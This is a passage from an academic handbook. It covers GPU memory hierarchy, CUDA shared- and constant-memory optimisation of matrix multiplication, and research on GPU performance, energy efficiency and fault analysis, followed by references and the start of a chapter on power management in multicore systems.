GPU is equipped with several different types of memories, some of which can
be accessed with special software APIs and compiler intrinsics.
Figure 7 shows the memory structures of GPU architecture. The following
subsections will explain each of the memories.
Global Memory
The GPU-side main memory is called global memory. Global memory is the largest
read-write region in the GPU device memory and is accessible by the host CPU to
send input data and receive output data of a GPU kernel function. The host CPU
can use the cudaMalloc and cudaMemcpy APIs to allocate variables in, and send and
receive data to and from, the global memory.
Shared Memory
Shared memory is an on-chip SRAM memory. One shared memory is utilized by
all thread blocks assigned to the same SM. As inter-thread block communication
is not supported, shared memory is also logically partitioned for each thread block.
Therefore, the GPU compiler (e.g., nvcc) checks the aggregated shared memory usage
of all thread blocks that are going to be assigned to each SM and generates
a compile error if the usage exceeds the shared memory size in an SM. The
shared memory is similar to scratchpad memory in a CPU, which is a programmer-
controllable on-chip memory. The data stored in shared memory can be accessed
with latency similar to that of the L1 cache, while being kept in the shared memory
throughout the application's execution time without concern about eviction, unlike the L1 cache.
With this performance advantage, allocating proper variables in the shared memory
is one of the most important performance optimizations in GPU programming. To
allocate data in the shared memory, a qualifier __shared__ should be used. To assign
values to the variables defined in the shared memory, regular store operations can be
used. For example, to load input data to the shared memory, the input data should be
loaded from the global memory to registers and then stored to the shared memory.
Similar to the register file, shared memory uses a banked structure. For example,
the shared memory in an NVIDIA Maxwell architecture has 32 banks, where each
bank has a 4-byte width. If all threads in a warp access different banks, all data will
be retrieved in one shared memory access latency (which is around five cycles). If
any threads access the same bank but for different data words, there will be a bank
conflict and the conflicted accesses will be sequentially executed. Therefore, the
shared memory accesses should be carefully designed by the programmer.
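As a brief illustration, the following CUDA kernel (a hypothetical example) stages data
in shared memory; with 32 banks of 4-byte width, each thread below touches a distinct
bank, so no bank conflicts occur.

__global__ void reverse32(int *data)
{
    __shared__ int s[32];  // on-chip, shared by the thread block
    int t = threadIdx.x;   // assumes a single block of 32 threads
    s[t] = data[t];        // global -> register -> shared memory store
    __syncthreads();       // wait until all 32 elements are written
    data[t] = s[31 - t];   // each thread reads a different bank
}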
L1 and L2 Caches
GPUs typically use a two-level cache hierarchy. Each SM has an on-chip L1 cache,
and the GPU device has a shared L2 cache. The L2 cache is connected to the SMs
through an interconnection network. Therefore, the access latency to L2 is normally
much longer than the L1 cache access time (which is around five cycles). Accesses
to the global memory are cached in the L1 and L2 caches. Unlike CPUs, where L1
caches are activated by default, GPU L1 caches can be configured for activation:
programmers can enable the L1 cache for a program with a compiler option at compile
time. Once L1 is disabled, global memory accesses are directly forwarded to L2, and
the L1’s physical SRAM space is used for either shared memory or texture cache,
depending on the GPU architecture configuration.
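For example, on NVIDIA toolchains the ptxas default load cache modifier controls whether global loads are cached in L1 (flag values per NVIDIA's ptxas documentation; the file name is illustrative):

nvcc -Xptxas -dlcm=ca prog.cu    (default: cache global loads in both L1 and L2)
nvcc -Xptxas -dlcm=cg prog.cu    (cache global loads in L2 only, bypassing L1)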
There can be multiple reasons to disable the L1 cache. The two main reasons are the
unique characteristics of GPU applications and efficient cache coherence support.
Though GPUs are also used for general-purpose applications, the dominant GPU
applications are graphics applications. In a graphics application, data locality and
the reuse rate are much lower than in general-purpose applications. Note that in image
processing, the pixel values are read, processed, and then stored to the output
framebuffer; in this course of processing, the same values are not likely to be
read repeatedly. Therefore, the L1 cache does not help performance much.
Regarding cache coherence, GPUs barely support L1-cache-level coherence because
thread blocks are regarded as independent, which means that there is no need
to enforce coherent data accesses. But if an algorithm requires some data sharing
across thread blocks (that run on different SMs), the shared L2 is used for coherent
data sharing. In this case, the updated data should be flushed to L2 so that all the
other SMs can see the up-to-date data. This two-level GPU coherence is called
scoped coherence (Hower et al. 2014). If the coherence scope is the thread block,
threads within the thread block are guaranteed to see the updates made within the
thread block, which matches the first case, where there is no need to have coherence
across L1 caches. If the coherence scope is the GPU device, coherent accesses are
forced through cache flushes to L2, which is the second case, where all L1 updates are
flushed to L2. When GPU-scoped coherence is used, L1 can be disabled because L1
will be bypassed anyway.
#define WIDTH 32
void MatrixMul(float* A, float* B, float* C)
{
    for (int i = 0; i < WIDTH; i++)
        for (int j = 0; j < WIDTH; j++)
            for (int k = 0; k < WIDTH; k++)
                C[i * WIDTH + j] += A[i * WIDTH + k] * B[k * WIDTH + j];
}
(a)
int main()
{
    ...
    float *g_A, *g_B, *g_C;
    cudaMalloc((void**)&g_A, WIDTH * WIDTH * sizeof(float));
    cudaMalloc((void**)&g_B, WIDTH * WIDTH * sizeof(float));
    cudaMalloc((void**)&g_C, WIDTH * WIDTH * sizeof(float));
    ...
}
(b)
The three matrices g_A, g_B, and g_C are allocated in the global memory. Each thread computes one output matrix element
by multiplying one row of A matrix and a column of B matrix.
Let us check the access patterns to these matrices to find the best memory to
map them to. The WIDTH value is 32. The kernel is executed by a thread group of
32 × 32 threads. According to the row and the column calculations in the kernel,
the 32 consecutive threads in each warp use the same row value and consecutive
column values. In the A matrix index calculation (A[row * WIDTH + k]), row
is the only thread-dependent variable. As the threads within a warp use the same
row value, each warp accesses the same A matrix element every cycle. Therefore,
a memory that is cacheable and can broadcast one value to all threads in a warp
is appropriate for matrix A, which is the constant memory. On the other hand,
in the B matrix index calculation (B[k * WIDTH + col]), all threads in
a warp access different elements in the same row. Therefore, constant memory
is not appropriate; a memory that allows parallel accesses, such as a banked memory
structure, is needed. The shared memory is a fast on-chip memory that has a banked
structure. Therefore, shared memory can well support the matrix B accesses. Finally,
regarding the C matrix, each element in C is independently calculated by one
thread. This means that threads can use a fast private memory for the computation.
Only when all the computations are finished is the result updated to the
shared C matrix, which resides in the global memory. Therefore, the register file, which
is the fastest private memory space in the GPU architecture, is optimal for the matrix C
computation.
Code 4 shows the optimized CUDA code. The A matrix is defined as a
global variable with the qualifier __constant__, as shown in line ①. Then, an API,
cudaMemcpyToSymbol(), is used to copy the matrix contents from the CPU system memory
to the constant memory (⑨). As matrix A is defined as a global variable, it
does not need to be passed as an input parameter (②). To define matrix B
in the shared memory, the qualifier __shared__ is used in the kernel (④). As shared
memory is not directly accessible by the host CPU, matrix B is initially copied to
the GPU global memory. Then, the matrix contents should be copied from the global
memory to the shared memory (⑤). Line ⑤ makes all threads collaboratively
load the matrix contents from the global memory to the shared memory, one element
per thread. To wait until all threads finish the data copy, a synchronization function,
__syncthreads(), is called (⑥). To maintain the intermediate computation result of
each thread in a register, a local variable is defined (③). If a variable is defined in
a kernel, each thread has one register entry for that variable. ⑦ shows the matrix
multiplication, where each thread multiplies a row of matrix A with a column of matrix
B. The computation result is collaboratively copied to the output matrix C in
the global memory, one element per thread (⑧).
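A sketch consistent with this description of Code 4 (keyed to the circled markers ① to ⑨; an illustrative reconstruction, not the author's verbatim listing, with host-side names such as h_A assumed):

#define WIDTH 32

__constant__ float c_A[WIDTH * WIDTH];                 // ① matrix A in constant memory

__global__ void MatrixMul(float* g_B, float* g_C)      // ② A is not passed as a parameter
{
    float sum = 0.0f;                                  // ③ per-thread result held in a register
    __shared__ float s_B[WIDTH * WIDTH];               // ④ matrix B in shared memory

    int row = threadIdx.y;
    int col = threadIdx.x;

    s_B[row * WIDTH + col] = g_B[row * WIDTH + col];   // ⑤ collaborative load, one element per thread
    __syncthreads();                                   // ⑥ wait until all threads finish the copy

    for (int k = 0; k < WIDTH; k++)                    // ⑦ one row of A times one column of B
        sum += c_A[row * WIDTH + k] * s_B[k * WIDTH + col];

    g_C[row * WIDTH + col] = sum;                      // ⑧ write the result to C in global memory
}

int main()
{
    float h_A[WIDTH * WIDTH], h_B[WIDTH * WIDTH], h_C[WIDTH * WIDTH];
    for (int i = 0; i < WIDTH * WIDTH; i++) { h_A[i] = 1.0f; h_B[i] = 2.0f; }

    float *g_B, *g_C;
    cudaMalloc((void**)&g_B, WIDTH * WIDTH * sizeof(float));
    cudaMalloc((void**)&g_C, WIDTH * WIDTH * sizeof(float));
    cudaMemcpy(g_B, h_B, WIDTH * WIDTH * sizeof(float), cudaMemcpyHostToDevice);

    cudaMemcpyToSymbol(c_A, h_A, WIDTH * WIDTH * sizeof(float)); // ⑨ CPU memory -> constant memory

    dim3 numBlock(1, 1);
    dim3 numThreads(WIDTH, WIDTH);                     // one 32 x 32 thread block
    MatrixMul<<<numBlock, numThreads>>>(g_B, g_C);

    cudaMemcpy(h_C, g_C, WIDTH * WIDTH * sizeof(float), cudaMemcpyDeviceToHost);
    cudaFree(g_B); cudaFree(g_C);
    return 0;
}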
Performance
GPGPU performance has been ever increasing since GPGPUs were released in the mid-2000s, thanks
to the significant efforts made by both academia and industry. In this subsection, a
few selected research works are introduced that tackled memory access latency, which
is one of the most critical performance bottlenecks in GPU computing.
Lee et al. (2015b) proposed CAWA, a coordinated warp scheduling and cache prioritization
scheme that detects the execution time imbalance across warps and improves performance
by allocating more time resources to the starving critical warps. To identify critical warps,
a criticality prediction logic monitors the execution progress of individual warps by
integrating one criticality counter per warp. The criticality counter is updated using the
instruction count disparity caused by diverged flows and the stall latencies caused by shared
resource contention.
Some other studies aimed at finding a warp scheduling algorithm that can
improve the effectiveness of memory prefetching. Jog et al. (2013) presented a prefetch-
aware warp scheduling policy. They observed that a simple next-line prefetcher
cannot improve performance as expected under two-level or round-robin warp
schedulers because the warps that use the prefetched next line are likely to be
scheduled in the immediately following scheduling cycle. Note that warps in a thread
group typically access consecutive memory addresses, and hence the next cache
line prefetched by a warp is consumed by an immediately following warp. Because
the immediately following warp is scheduled one scheduling cycle later than the warp
that issued the prefetch, the prefetched data are likely to arrive too late. To place
a sufficient time gap between a prefetch and the data access, the scheduler forms fetch
groups with nonconsecutive warps. By scheduling the warps in the same fetch group
in consecutive time windows and having the warps in the group issue prefetches
for another fetch group, a prefetch can be issued well ahead of the actual
accesses.
Oh et al. (2019) proposed Linebacker, which uses underutilized register file space as a victim cache. Once data in the victim cache is
accessed again, it can be quickly copied to the requesting instruction's registers inside the
register file. To improve the opportunities to spare victim cache space in the register
file, they apply CPU-like thread group context switching, where the register values
of an inactive thread group are copied to the off-chip memory. Using register space
as a victim cache can perform better than a conventional victim cache
because data can be moved via an intra-register file copy when reused.
Some studies reduced memory traffic by increasing the opportunities for intra-
register data sharing. The following two studies exploited unique computation
patterns of deep learning workloads for intra-register data sharing. Jeon et al.
(2019) observed high data sharing opportunities among neighboring neurons in the
convolution operations of a convolutional neural network (CNN). The proposed
perfect sharing and partial sharing enable the neurons to access data from the register
file if the data have already been fetched by neighboring neurons, instead of issuing redundant
memory accesses. To enable zero-copy register-level data sharing, they propose
to simply rename the physical register pointer with the architected register of the
requesting neuron (thread). Kim et al. (2020) similarly exploited the high data locality
in convolution operations with register-level data sharing. They track the history of
memory accesses to determine whether the data already exist in the register file. Once the data are
located in the register file, they map the data to the requesting warp by using register
renaming. Their design accommodates the unique access patterns made by CUDA
Tensor Core operations.
A recent study proposed to make the L1 caches a shared resource for multiple
SMs. Ibrahim et al. (2021) observed that local L1 caches are not efficiently utilized
because data that are commonly used by thread blocks are redundantly loaded
into multiple L1 caches. Also, the bandwidth imbalance between the local L1 and the
common L2 is significant. To resolve these problems, they designed the L1 caches to be
decoupled from the SMs and interfaced with the SMs via an interconnection network. Depending
on the access patterns, the connections are aggregated or private. They explored
the performance impacts of various mapping configurations.
Energy Efficiency
GPUs show better energy efficiency (in FLOPS per watt) than CPUs because
GPUs can achieve better throughput per watt with massive parallelism, even without
the complex architecture components of CPUs such as sophisticated branch predictors, out-of-order
execution, and cache coherence protocols. However, due to the abundant
computing resources that enable massive parallelism (e.g., hundreds of compute
cores and megabytes of register file), the overall power consumption increases
rapidly with each new GPU generation. With the increasing power consumption,
it is hard to integrate more computing logic that is essential for improving
performance. Thus, the power overhead will eventually slow down the performance
improvement of GPUs. There have been extensive efforts from both academia
and industry to improve GPU energy efficiency. Figure 11 shows the architecture-level
breakdown of GPU power consumption (e.g., across execution units and constant memory).
Some studies exploited the inherent similarity in operand values and instructions
to save power. Wong et al. (2016) leveraged operand value similarity to reduce
energy consumption. The proposed method, named warp approximation, detects
value similarity in the operands and makes one representative SIMT lane execute the
instructions and the corresponding register accesses on behalf of multiple lanes that
use similar operands. By providing a programming interface that enables program-
mers to annotate the regions of code that can safely run under warp approximation, the
technique improves GPU energy efficiency by 26% with negligible final
output errors.
Kim and Ro (2018) observed that there are quite a few identical warp-level
instructions across thread blocks. While threads in a warp may use similar but not
identical operand values, at the inter-warp level there are warps that use exactly
the same operands, because thread blocks execute the same kernel code and thread
IDs are repeated across thread blocks. Such redundant warp execution may lead to
energy overhead. Thus, the authors proposed to reuse warp instructions and the
corresponding registers. By eliminating redundant executions, dynamic power was
effectively reduced. The register reuse also saves register usage by mapping one
physical register to multiple architected registers.
Jeon et al. (2015) proposed GPU register file virtualization, which allocates physical
register space for only the live registers, thereby running most GPU workloads with a 50% smaller
register file without performance degradation. By cutting the register file in half,
register file virtualization effectively reduces the GPU's static and dynamic power
consumption. They also designed a scheduling algorithm to avoid deadlock situations
caused by the limited register resources for large workloads.
Lee et al. (2015a) tackled register file energy efficiency by shrinking the space
requirement of each warp-level register. They observed that GPU workloads have
inherent value similarity among threads within a warp. For example, if a warp
traverses an array, the threads in that warp are typically assigned to access consecutive
elements. Therefore, neighboring threads typically use consecutive array index
values, where the value distance between adjacent threads is only 1. The authors
pointed out that storing these continuous values in 32 separate register entries is a waste
of register space. Instead, they integrate a simple base-delta-immediate compression
where the first thread of a warp stores a base value in a 32-bit register entry while
the remaining 31 threads store only the distance values. This way, the warp-level
register space is effectively shrunk to as little as 2 bytes per thread. The compressed register values
are maintained in fewer register banks than the uncompressed ones. The register file
compression reduces both the dynamic and static power of the register file by reducing
the number of register bank accesses and enabling opportunistic power gating
of the empty register banks.
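As a toy illustration of this base-delta idea (a software model only; the names are invented, and the real design is a hardware register-file compressor):

bool bdi_compress(const int values[32], int* base, signed char delta[32])
{
    *base = values[0];                   // lane 0 keeps the full 32-bit base
    for (int i = 0; i < 32; i++) {
        int d = values[i] - *base;
        if (d < -128 || d > 127)         // here each delta must fit in 1 byte
            return false;                // fall back to uncompressed storage
        delta[i] = (signed char)d;
    }
    return true;                         // 128 B of lane values -> 4 B + 32 B
}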
Lee et al. (2017) extended the register file compression to support compressed
execution. By leveraging the adder and subtractor logic used by the operand
decompressor, they allow additions and subtractions to be performed
inside the register file. The compressed execution can bypass the execution stage,
thereby saving execution unit power consumption.
Esfeden et al. (2019) further increased register file utilization efficiency by
squeezing multiple narrow-width register values into one register entry. The authors
observed that a significant fraction of register values in GPU computing falls into
only one to two bytes. To reduce the register bandwidth wasted on retrieving unnecessary
bits, they combine multiple architected registers of a warp into one register entry. To
avoid potential register bank conflicts caused by the register packing, they applied a
graph coloring algorithm to find pairs of registers to be packed. The registers
that are commonly used by the same instruction are packed together. This way,
the register bandwidth can be reduced even further because two operands of an
instruction can be read with one register entry access. With the operand coalescing
and packing, both register file usage and accesses are reduced, which leads to
improvements in register file power efficiency and overall performance.
Reliability
With Moore’s Law, transistor size is decreased to even a several nanometer scale
today. Though the small transistor size helps integrate more cores and fancy micro-
architecture components on the integrated circuits, it also increases vulnerability
to various hardware errors. Most of permanent errors (e.g., stuck-at-zero) can be
556 H. Jeon
screened at the testing steps in the fabrication process. However, soft errors that are
caused by particle strikes coming from cosmic ray or processor packages cannot
be completely filtered. Also, the denser the transistors are integrated, the more
transistors can be struck by one soft error. Thus, the concerns for multi-bit flips are
increasing. The non-general-purpose GPUs have not integrated reliability supports
because graphics applications are inherently error prone. Note that one to two pixel
errors in an image are acceptable if those are not perceivable by human eyes. But, as
GPUs are used for general-purpose applications, a few bit flips may lead to a critical
computation error. There have been a few studies that try to detect and correct errors
occurring in various architecture components in GPUs.
Fault Analysis
The aforementioned studies aimed at detecting and correcting any errors occurring in
the computations, regardless of the actual location of the error. This is called coarse-
grained error coverage. Some other studies examined vulnerability at a finer
granularity, such as the logic-gate level, register bit level, or pipeline stage level. The
finer-grained vulnerability studies use fault injection methods. They pick a few fault
sites in either some architecture components or data, inject errors into the fault sites
(e.g., flip bits), and check the total number of corruptions and detected errors from
an application execution. Nie et al. (2018) examined the fault sites necessary to
inject errors into in order to evaluate the overall vulnerability of GPU computing. They observed
that the abundant resources and massive parallelism of GPU computing require a
huge number of fault sites, which is almost impractical to cover without a significant
performance overhead. To reduce the overhead, they leveraged the inherent computation
redundancies among threads, warps, and thread blocks in GPU computing. If there
are any redundant control flows (even when the operands are not exactly matching),
they add faults only to some representative executions. For example, if there is a
warp divergence, errors are injected into only one thread’s execution per diverged
flow. Likewise, some representative loop iterations for a whole loop execution, and a
few bits in each data word that are more vulnerable to errors, are identified
as fault sites. With such a significant fault site reduction, they achieved error coverage
similar to the non-pruned approach, with significantly less effort for fault
injection.
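The elementary operation behind such fault injection is a bit flip at a chosen fault site; a minimal sketch (function and parameter names are illustrative):

unsigned int inject_fault(unsigned int value, int bit)
{
    return value ^ (1u << bit);   // flip one selected bit, emulating a soft error
}

// e.g., corrupt bit 12 of one representative thread's operand:
// reg = inject_fault(reg, 12);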
Conclusion
This chapter describes the basic concepts and design details of GPU architecture. The
focus of this chapter is to help readers understand the reasons behind the high
throughput of GPU computing. As GPU architectures and programming interfaces
are quickly evolving, this chapter explores the core architecture components and
interfaces, with which readers can easily catch up on the advanced features and
latest updates of GPU architectures.
References
Abdel-Majeed M, Dweik W, Jeon H, Annavaram M (2015) Warped-RE: low-cost error detection
and correction in GPUs. In: Proceedings of the 45th annual IEEE/IFIP international conference
on dependable systems and networks, 2015 June 22–25, Rio de Janeiro, Brazil
Abdel-Majeed M, Shafaei A, Jeon H, Pedram M, Annavaram M (2017) Pilot register file: energy
efficient partitioned register file for GPUs. In: Proceedings of the IEEE international symposium
on High performance computer architecture (HPCA), 2017 Feb 4–8, Austin, TX, USA
Alverson R, Callahan D, Cummings D, Koblenz B, Porterfield A, Smith B (1990) The tera
computer system. In: ACM SIGARCH computer architecture news, 1990 Sept, vol 18(3b), pp
1–6
AMD (2021) AMD HIP programming guide v1.0. [Internet]. Available from: https://github.com/RadeonOpenCompute/ROCm/blob/master/AMD_HIP_Programming_Guide.pdf
Esfeden HA, Khorasani F, Jeon H, Wong D, Abu-Ghazaleh NB (2019) CORF: Coalescing Operand
Register File for GPUs. In: international conference on architectural support for programming
languages and operating systems, April 2019, Providence, RI
Gebhart M, Keckler SW, Dally WJ (2011) A compile-time managed multi-level register file
hierarchy. In: Proceedings of the 45th annual IEEE/ACM international symposium on microar-
chitecture (MICRO), 2011 Dec 3–7, Porto Alegre Brazil
Hower DR, Hechtman BA, Beckmann BM, Gaster BR, Hill MD, Reinhardt SK, Wood DA (2014)
Heterogeneous-race-free memory models. In: Proceedings of the international conference on
architectural support for programming languages and operating systems (ASPLOS), Mar 1–5
2014, Salt Lake City, Utah, USA
Ibrahim MA, Kayiran O, Eckert Y, Loh GH, Jog A (2021) Analyzing and leveraging decoupled
L1 caches in GPUs. In: Proceedings of the IEEE international symposium on high-performance
computer architecture (HPCA), Feb 27–Mar 3 2021, Seoul, Korea
Jeon H, Annavaram M (2012) Warped-DMR: light-weight error detection for GPGPU. In:
Proceedings of the 45th annual IEEE/ACM international symposium on microarchitecture
(MICRO), 2012 Dec 1–5, Vancouver, BC, Canada
Jeon H, Ravi GS, Kim NS, Annavaram M (2015) GPU register file virtualization. In: Proceedings
of the 48th annual IEEE/ACM international symposium on microarchitecture (MICRO), 2015
Dec 5–9, Waikiki, HI, USA
Jeon H, Esfeden HA, Abu-Ghazaleh NB, Wong D, Elango S (2019) Locality-aware GPU register
file. IEEE Comput Archit Lett 18(2):153–156
Jog A, Kayiran O, Mishra AK, Kandemir MT, Mutlu O, Iyer R, Das CR (2013) Orchestrated
scheduling and prefetching for GPGPUs. In: Proceedings of the 40th annual international
symposium on computer architecture (ISCA), 2013 June 23, Tel Aviv, Israel
Kim K, Ro WW (2018) WIR: warp instruction reuse to minimize repeated computations in
GPUs. In: Proceedings of the IEEE international symposium on high-performance computer
architecture (HPCA), 2018 Feb 24–28, Vienna, Austria
Kim K, Lee S, Yoon MK, Koo G, Ro WW, Annavaram M (2016) Warped-preexecution: a GPU
pre-execution approach for improving latency hiding. In: Proceedings of the IEEE international
symposium on high performance computer architecture (HPCA), 2016 Mar 12–16, Barcelona,
Spain
Kim H, Ahn S, Oh Y, Bo K, Ro WW, Song W (2020) Duplo: lifting redundant memory accesses
of deep neural networks for GPU tensor cores. In: Proceedings of the 53rd annual IEEE/ACM
international symposium on microarchitecture (MICRO), 2020 Oct 17–21, Athens, Greece
Koo G, Oh Y, Ro WW, Annavaram M (2017) Access pattern-aware cache management for
improving data utilization in GPU. In: Proceedings of the ACM/IEEE 44th annual international
symposium on computer architecture (ISCA), 2017 June 24–28, Toronto, ON, Canada
Lai J, Seznec A (2013) Performance upper bound analysis and optimization of SGEMM on Fermi
and Kepler GPUs. In: Proceedings of the 2013 IEEE/ACM international symposium on code
generation and optimization (CGO), 2013 Feb 23, pp 1–10
Lee S, Kim K, Koo G, Jeon H, Ro WW, Annavaram M (2015a) Warped-compression: enabling
power efficient GPUs through register compression. In: Proceedings of the ACM/IEEE 42nd
annual international symposium on computer architecture (ISCA), 2015 June 13–17, Portland,
OR, USA
Lee S, Arunkumar A, Wu C (2015b) CAWA: coordinated warp scheduling and cache prioritization
for critical warp acceleration of GPGPU workloads. In: Proceedings of the ACM/IEEE 42nd
annual international symposium on computer architecture (ISCA), 2015 June 13–17, Portland,
OR, USA
Lee S, Kim K, Koo G, Jeon H, Annavaram M, Ro WW (2017) Improving energy efficiency of
GPUs through data compression and compressed execution. IEEE Trans Comp 66(5):834–847
Nie B, Yang L, Jog A, Smirni E (2018) Fault site pruning for practical reliability analysis of
GPGPU applications. In: Proceedings of the 51st international symposium on microarchitecture
(MICRO), 2018 Oct 20–24, Fukuoka, Japan
NVIDIA (2012) NVIDIA Geforce GTX 680 white paper v1.0. [Internet]. Available from: https://www.nvidia.com/content/PDF/product-specifications/GeForce_GTX_680_Whitepaper_FINAL.pdf
NVIDIA (2016) NVIDIA Tesla P100 white paper v1.1. [Internet]. Available from: https://images.nvidia.com/content/pdf/tesla/whitepaper/pascal-architecture-whitepaper.pdf
NVIDIA (2022) CUDA C++ Programming Guide v11.6. [Internet]. Available from: https://docs.nvidia.com/cuda/pdf/CUDA_C_Programming_Guide.pdf
Oh Y, Koo G, Annavaram M, Ro WW (2019) Linebacker: preserving victim cache lines in idle
register files of GPUs. In: Proceedings of the ACM/IEEE 46th annual international symposium
on computer architecture (ISCA), 2019 June 22–26, Phoenix, AZ, USA
Pattnaik A, Tang X, Kayiran O, Jog A, Mishra A, Kandemir MT, Sivasubramaniam A, Das CR
(2019) Opportunistic computing in GPU architectures. In: Proceedings of the 46th international
symposium on computer architecture (ISCA), 2019 June 22, Phoenix, Arizona
Rogers TG, O’Connor M, Aamodt TM (2012) Cache-conscious wavefront scheduling. In: Proceed-
ings of the IEEE/ACM 45th annual international symposium on microarchitecture (MICRO),
2012 Dec 1–5, Vancouver, BC, Canada
Rogers TG, O’Connor M, Aamodt TM (2013) Divergence-aware warp scheduling. In: Proceedings
of the IEEE/ACM 45th annual international symposium on microarchitecture (MICRO), 2013
Dec 7–11, Davis, CA, USA
Sethia A, Jamshidi D A, Mahlke S (2015) Mascar: speeding up GPU warps by reducing memory
pitstops. In: IEEE 21st international symposium on high performance computer architecture
(HPCA), 2015 Feb 7–11, Burlingame, CA, USA
Tan J, Fu X (2012) RISE: improving the streaming processors reliability against soft errors in
GPGPUs. In: Proceedings of the 21st international conference on parallel architectures and
compilation techniques (PACT), 2012 Sept 19–23, Minneapolis, Minnesota, USA
Top500 (2021) Top 500 supercomputer lists. [Internet]. Available from: https://www.top500.org/
Wong D, Kim NS, Annavaram M (2016) Approximating warps with intra-warp operand value
similarity. In: IEEE international symposium on high performance computer architecture,
March 2016, Barcelona, Spain
Power Management of Multicore Systems
17
Behnaz Ranjbar, Amit Kumar Singh, Siva Satyendra Sahoo,
Piotr Dziurzanski, and Akash Kumar
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 562
Power Dissipation in Multicore Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 564
Causes and Effects of Power Dissipation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 564
Power Dissipation in Multicore Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 567
Common Power Reduction Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 568
Hardware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 568
Firmware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 569
Software . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 571
Power Management: Embedded Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 572
Energy Minimization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 572
Thermal Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 574
Reliability Improvement . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 578
Power Management: Desktop and Servers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 580
ACPI Standard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 581
Power Schemes: Governors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 582
Power Management: High-Performance Computing (HPC) Data Centers . . . . . . . . . . . . . . . 583
Fast Heuristics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 584
Heuristics Using Design-Time Profiling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 584
Machine Learning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 585
Network Technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 585
Abstract
Multicore systems have become the de facto computing platform for electronic
systems, especially since 2005 when the single-core/thread performance hit
the power wall. Consequently, integrating an increasing number of processing
elements on a single integrated circuit has become one of the primary research
goals in both architecture- and semiconductor technology-level design. However,
the increasing power density in multicore systems has also led to increasing
dark silicon, where a majority of the on-chip resources need to be turned off to
avoid thermal issues. To this end, intelligent power management constitutes
a major focus of research in the system-level design of multicore systems. This
chapter provides a brief overview of the background knowledge and the related
state-of-the-art research. The chapter presents a summary of the causes and
effects of power dissipation in electronic systems along with brief descriptions
of the more commonly used power reduction methods. The chapter then presents
the state-of-the-art research works in power management across different scales
of multicore systems: embedded systems, desktops/client PCs, and HPC servers.
The chapter also provides a brief overview of more recent topics related to
power management, such as power dissipation in 2.5D/3D systems, cross-layer
power management, and AI/ML-based power management.
Keywords
Introduction
Since around 2005, multicore processing has become the primary approach for
utilizing the increasing number of transistors on a semiconductor integrated circuit
(IC) (Held et al. 2006). This has also resulted in a shift of the focus in
software/algorithm development to improving performance by exploiting Thread Level
Parallelism (TLP). Similarly, IC manufacturers have focused on integrating more
and more cores onto the same IC to support increased TLP. This continuous effort
– both in terms of software development and hardware design – has translated to an
increasing portion of an IC executing at full throttle continuously. Consequently,
Fig. 1 Dark silicon: performance improvement with increasing area budgets and increasing
proportion of dark silicon transistors. (Figure reproduced from Turakhia et al. 2013)
the very phenomenon behind the paradigm shift to multicore computing – high
power density – is increasingly becoming the bottleneck to extracting higher
performance from multicore systems. This phenomenon, sometimes referred to as
dark silicon (Fig. 1), means that given the thermal and power limits of the system,
with each generation of semiconductor process technology, there is a reduction in
the fraction of transistors that can operate at maximum frequency (Kim et al. 2017).
Hence, power management in multicore systems involves extracting the maxi-
mum performance within the power density bounds of the system. The contributions
to the increasing power density can be from multiple processing elements. In
addition to actual computation, multicore processing involves varying degrees
of data sharing and inter-core communication. Hence, varying levels of on-chip
memory and interconnects contribute to the power dissipation, along with the
computation cores. Depending upon the area of application, the multicore archi-
tecture can contain varying types and amounts of computation, communication, and
memory elements. Based on the area of application, multicore systems are broadly
categorized into three types: embedded systems, personal computing systems, and
High Performance Computing (HPC) systems. Depending upon the type of the
system, the goal of power management may vary to some extent. For instance,
in some embedded systems, improving system lifetime can be equally important
as reducing power and energy consumption. Similarly, the methods used for power
reduction for each system may vary depending on the system’s goals. These methods
may involve hardware design, software design, or a combination of both. Similarly,
the design decisions regarding the implementation of these methods may involve
Design Space Exploration (DSE) either during compile time or runtime or a hybrid
of both.
For any circuit element, the instantaneous power supplied and/or consumed is the
product of the voltage across and the current through the element (Eq. 1):

$$P(t) = V(t) \times I(t) \qquad (1)$$

The resulting energy supplied/consumed over a time interval $T$, and the average power dissipation
over the same interval, can be estimated as shown in Eqs. 2 and 3, respectively:

$$E = \int_{0}^{T} P(t)\,dt \qquad (2)$$

$$P_{avg} = \frac{1}{T}\int_{0}^{T} P(t)\,dt \qquad (3)$$
In CMOS-based circuits, the power and energy are modeled as a function of the
load driven by the circuit and the supply voltage. Figure 2 shows a CMOS inverter
driving a capacitive load CL and with a supply voltage VDD . The resulting energy
supplied and stored while CL is charged through the Positive channel Metal Oxide
Semiconductor (PMOS) are given by Eqs. 4 and 5, respectively.
